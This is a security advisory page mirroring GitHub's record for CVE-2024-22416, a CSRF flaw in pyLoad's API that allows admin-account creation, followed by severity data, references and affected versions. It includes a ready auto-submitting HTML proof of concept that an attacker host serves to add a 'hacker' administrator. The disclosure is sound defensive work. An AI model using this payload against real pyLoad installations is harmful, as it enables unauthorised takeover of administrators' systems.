Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1wZ3BqLXY4NXEtaDVmbc4AA4kU
Cross-Site Request Forgery on any API call in pyLoad may lead to admin privilege escalation
Summary
The pyload API allows any API call to be made using GET requests. Since the session cookie is not set to SameSite: strict, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. This proof of concept shows how an unauthenticated user could trick the administrator's browser into creating a new admin user.
PoC
We host the following HTML file on an attacker-controlled server.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost:8000/api/add_user/%22hacker%22,%22hacker%22">
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
If we now trick an administrator into visiting our malicious page at https://attacker.com/CSRF.html, we see that their browser will make a request to /api/add_user/%22hacker%22,%22hacker%22, adding a new administrator to the pyload application.
The attacker can now authenticate as this newly created administrator user with the username hacker and password hacker.
Impact
Any API call can be made via a CSRF attack by an unauthenticated user.
Permalink: https://github.com/advisories/GHSA-pgpj-v85q-h5fmJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wZ3BqLXY4NXEtaDVmbc4AA4kU
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: 4 months ago
Updated: 3 months ago
CVSS Score: 9.7
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Identifiers: GHSA-pgpj-v85q-h5fm, CVE-2024-22416
References:
- https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm
- https://nvd.nist.gov/vuln/detail/CVE-2024-22416
- https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e
- https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc
- https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml
- https://github.com/advisories/GHSA-pgpj-v85q-h5fm
Blast Radius: 0.0
Affected Packages
pypi:pyload-ng
Dependent packages: 0Dependent repositories: 1
Downloads: 2,738 last month
Affected Version Ranges: < 0.5.0b3.dev78
Fixed in: 0.5.0b3.dev78
All affected versions: 0.5.0-a5.dev528, 0.5.0-a5.dev532, 0.5.0-a5.dev535, 0.5.0-a5.dev536, 0.5.0-a5.dev537, 0.5.0-a5.dev539, 0.5.0-a5.dev540, 0.5.0-a5.dev545, 0.5.0-a5.dev562, 0.5.0-a5.dev564, 0.5.0-a5.dev565, 0.5.0-a6.dev570, 0.5.0-a6.dev578, 0.5.0-a6.dev587, 0.5.0-a7.dev596, 0.5.0-a8.dev602, 0.5.0-a9.dev615, 0.5.0-a9.dev629, 0.5.0-a9.dev632, 0.5.0-a9.dev641, 0.5.0-a9.dev643, 0.5.0-a9.dev655, 0.5.0-a9.dev806, 0.5.0-b1.dev1, 0.5.0-b1.dev2, 0.5.0-b1.dev3, 0.5.0-b1.dev4, 0.5.0-b1.dev5, 0.5.0-b2.dev9, 0.5.0-b2.dev10, 0.5.0-b2.dev11, 0.5.0-b2.dev12, 0.5.0-b3.dev13, 0.5.0-b3.dev14, 0.5.0-b3.dev17, 0.5.0-b3.dev18, 0.5.0-b3.dev19, 0.5.0-b3.dev20, 0.5.0-b3.dev21, 0.5.0-b3.dev22, 0.5.0-b3.dev24, 0.5.0-b3.dev26, 0.5.0-b3.dev27, 0.5.0-b3.dev28, 0.5.0-b3.dev29, 0.5.0-b3.dev30, 0.5.0-b3.dev31, 0.5.0-b3.dev32, 0.5.0-b3.dev33, 0.5.0-b3.dev34, 0.5.0-b3.dev35, 0.5.0-b3.dev38, 0.5.0-b3.dev39, 0.5.0-b3.dev40, 0.5.0-b3.dev41, 0.5.0-b3.dev42, 0.5.0-b3.dev43, 0.5.0-b3.dev44, 0.5.0-b3.dev45, 0.5.0-b3.dev46, 0.5.0-b3.dev47, 0.5.0-b3.dev48, 0.5.0-b3.dev49, 0.5.0-b3.dev50, 0.5.0-b3.dev51, 0.5.0-b3.dev52, 0.5.0-b3.dev53, 0.5.0-b3.dev54, 0.5.0-b3.dev57, 0.5.0-b3.dev60, 0.5.0-b3.dev62, 0.5.0-b3.dev64, 0.5.0-b3.dev65, 0.5.0-b3.dev66, 0.5.0-b3.dev67, 0.5.0-b3.dev68, 0.5.0-b3.dev69, 0.5.0-b3.dev70, 0.5.0-b3.dev71, 0.5.0-b3.dev72, 0.5.0-b3.dev73, 0.5.0-b3.dev74, 0.5.0-b3.dev75, 0.5.0-b3.dev76, 0.5.0-b3.dev77
All unaffected versions: